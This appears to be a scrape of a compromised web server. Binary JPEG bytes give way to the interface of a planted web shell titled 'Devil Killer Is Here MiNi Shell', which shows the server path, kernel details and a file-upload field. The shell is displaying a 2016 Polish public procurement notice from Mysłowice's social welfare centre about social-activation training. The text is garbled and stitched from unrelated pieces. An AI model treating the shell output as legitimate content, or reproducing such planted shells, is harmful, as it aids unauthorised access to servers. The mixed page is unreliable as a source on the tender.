JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160801/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160801/300123-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 300123 - 2016
              z dnia 2016-08-01 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Mysłowice: Szkolenia w zakresie aktywizacji społecznej uczestników projektu Ja= Sukces<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />projekt pozakonkursowy "Ja= Sukces", współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Osi Priorytetowej: IX Włączenie społeczne, Działanie: 9.1. Aktywna integracja, Poddziałanie: 9.1.6. Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014  2020 </div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej lub wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px" /><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Prawo zamówień publicznych, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br />
            1. <br />
            2. <br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych::</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miejski Ośrodek Pomocy Społecznej, krajowy numer identyfikacyjny
              344718000000, ul.
              ul. Gwarków 
              24,
              41400  
              Mysłowice, woj.
              śląskie, państwo
              , tel.
              322 221 289, e-mail
              , faks
              322 221 289.
              <br />
              adres strony internetowej  www.mops.myslowice.pl<br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                </div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów zamówienia można uzyskać pod adresem (URL)</b><div style="padding-left: 20px"><br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.mops.myslowice.bip.info.pl</div><br /><b>Dostęp do dokumentów zamówienia jest ograniczony- więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px"><br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px"><br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br /><br /><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pocztą, kurierem lub osobiście <br />
                Pod adres:
                <br />ul.Gwarków 24, 41-400 Mysłowice</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnodostępne </b><div style="padding-left: 20px"><br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Szkolenia w zakresie aktywizacji społecznej uczestników projektu Ja= Sukces<b>Numer referencyjny: </b>DA.331-06/16<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify" /><br /><b>II.1.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.1.3) </b><br /><b>Zamówienie podzielone jest na części:</b><br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.1.4) Krótki opis przedmiotu zamówienia  <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Część I: Trening kompetencji społecznych dla osób bezrobotnych oraz nieaktywnych zawodowo

Liczba uczestników: 20 osób dorosłych  uczestników/uczestniczek projektu 
Liczba dzieci wymagających opieki podczas zajęć ich rodzica: 10 (w wieku od 2 do 12 lat) 
Czas trwania: 5 dni (4 noclegi) w terminie: 23.08-29.08.2016 r. (pobyt powinien rozpocząć się           i zakończyć obiadem) 
Liczba godzin zajęć w formie warsztatów: 35 godzin lekcyjnych na osobę (5 dni) 

Program szkolenia do zrealizowania: 
Dzień 1 wyjazd z parkingu przy ul. Gwarków w Mysłowicach (obok boiska sportowego), pobyt zaczyna się od obiadu. 
Program szkolenia (35 godzin lekcyjnych) 
Część II: Trening umiejętności społecznych z elementami planowania rodziny  dla osób przebywających bądź opuszczających pieczę zastępczą oraz młodzieży pochodzącej z rodzin zagrożonych wykluczeniem społecznym.

Liczba uczestników: 14 osób (młodzież w wieku 11-21 lat)  uczestników/uczestniczek projektu
Czas trwania: 5 dni (4 noclegi) w terminie: 23-29.08.2016 r. (pobyt powinien rozpocząć się i zakończyć obiadem) 
Liczba godzin zajęć w formie warsztatów: 32 godziny lekcyjne na osobę (5 dni)  
Wyjazd z parkingu przy ul. Gwarków w Mysłowicach (obok boiska sportowego), pobyt zaczyna się od obiadu, 
<br /><br /><b>II.1.5) Główny kod CPV: </b>80570000-0<br /><b>
                II.1.6) Całkowita wartość zamówienia <i>(jeżeli zamawiający podaje informacje o wartości zamówienia</i>:
              </b>
              Wartość bez VAT:
              52610<br />
              Waluta:
              <br /><div style="padding-left: 20px">
                  PLN
                <br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.1.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.1.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 29/08/2016<br /></div><br /><b>II.1.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów, w tym wymogi związane z wpisem do rejestru zawodowego lub handlowego   </b><br />
                Określenie warunków:
                O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; Wymagany jest wpis do rejestru o którym mowa w ustawie o usługach turystycznych (Dz.U. 2016 poz. 187) opis sposobu dokonania oceny tego warunku: na podstawie przedstawionego wpisu oraz oświadczenia. 

<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wymagania wobec kadry prowadzącej kurs:
- doświadczenie w prowadzeniu szkoleń  podanej tematyce dla grupy adekwatnej - min. 3 szkolenia w ostatnich 3 latach, dla grupy min. 10 osób.
- wykształcenie wyższe psychologiczne, uprawnienia trenerskie ( poparte odpowiednimi certyfikatami), adekwatne do tematyki szkolenia.<br />
                Czy zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                III.1.4) Informacje dodatkowe
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                    (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                  <br />
                    (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                  <br />
                    (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                  <br />
                    (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                  <br />
                    (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                  <br />
                    (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                  <br />
                    (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                  <br />
                    (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                  <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE WYKONAWCA NIE PODLEGA WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
                III.4) WYKAZ DOKUMENTÓW I OŚWIADCZEŃ, KTÓRE WYKONAWCA SKŁADA W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO NA POTWIERDZENIE OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY:
              </b><br /><div style="padding-left: 20px">- zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu  potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych
płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
- zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego
Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek
na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu
składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego,
że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami
lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty
zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
- odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy
wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie
art. 24 ust. 5 pkt 1 ustawy;
- oświadczenie wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej
o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo 
w przypadku wydania takiego wyroku lub decyzji  dokumentów potwierdzających dokonanie płatności tych należności
wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;
- oświadczenie wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się
o zamówienia publiczne;
- oświadczenie wykonawcy o braku wydania prawomocnego wyroku sądu skazującego za wykroczenie na karę ograniczenia
wolności lub grzywny w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6
ustawy;
- oświadczenie wykonawcy o braku wydania wobec niego ostatecznej decyzji administracyjnej o naruszeniu obowiązków
wynikających z przepisów prawa pracy, prawa ochrony środowiska lub przepisów o zabezpieczeniu społecznym
w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 7 ustawy;
- oświadczenie wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia
12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716);
- oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku
przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje
potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji
w postępowaniu.</div><b>
                III.5) WYKAZ DOKUMENTÓW I OŚWIADCZEŃ, KTÓRE WYKONAWCA SKŁADA W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO NA POTWIERDZENIE OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />- świadczenie, że kadra prowadzącej kurs posiada: doświadczenie w prowadzeniu szkoleń  podanej tematyce dla osób bezrobotnych/młodzieży - min. 3 szkolenia w ostatnich 3 latach, dla grupy min. 10 osób oraz wykształcenie wyższe psychologiczne, uprawnienia trenerskie ( poparte odpowiednimi certyfikatami), adekwatne do tematyki szkolenia,
- wykaz przeprowadzonych szkoleń j.w
- wypis z rejestr wojewody dot. usług turystycznych 
<b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />- wykaz przeprowadzonych szkoleń przez wykazaną kadrę innych niż wykazanych do potwierdzenia spełnienia warunków udziału w postępowaniu a spełniających te same wymagania.
Za każde powielenie spełniania warunku udziału w postępowaniu wykonawca uzyska 10 pkt. max w tym kryterium można uzyskać 50 pkt.
Przy wykazaniu większej ilości osób przewidzianych do realizacji zamówienia, zostanie oceniona osoba spełniająca warunek udziału w postępowaniu i posiadająca najmniej dodatkowego doświadczenia. 
</div><b>
                III.6) WYKAZ DOKUMENTÓW I OŚWIADCZEŃ, KTÓRE WYKONAWCA SKŁADA W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO NA POTWIERDZENIE OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Dodatkowe informacje:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br /><br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br /></div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br /><br />
                Dodatkowe informacje:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br /><br />
                Dodatkowe informacje:
                <br /><br />
                Czy w ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:Czy przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br /></div><br /><b>IV.1.8) Aukcja elektroniczna </b><b>Przewidziane jest przeprowadzenie aukcji elektronicznej? <i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> : </b>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br />
                nie
              <br /><b>
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              </b><br /><b>Informacje dotyczące przebiegu aukcji elektronicznej: </b><br /><b>Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): </b><br /><b>Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: </b><br /><b>Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: </b><br /><b>Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: </b><div style="padding-left: 20px"><br /><b>Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: </b><br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>50</td></tr><tr><td>doświadczenie kadry</td><td>50</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp (przetarg nieograniczony)</b><br />
              tak
            <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne (jeżeli dotyczy)</b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Dodatkowe informacje
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań :
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br /><br />
              Dodatkowe informacje:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><b> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna</b><br /><div style="padding-left: 20px"></div><b> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej</b><br /><div style="padding-left: 20px"></div><b>Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych</b><br /><div style="padding-left: 20px"></div><b> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień</b><br /><div style="padding-left: 20px"></div><b> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: </b><div style="padding-left: 20px"><br /><b>Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: </b></div><b> Termin otwarcia licytacji elektronicznej</b><br /><div 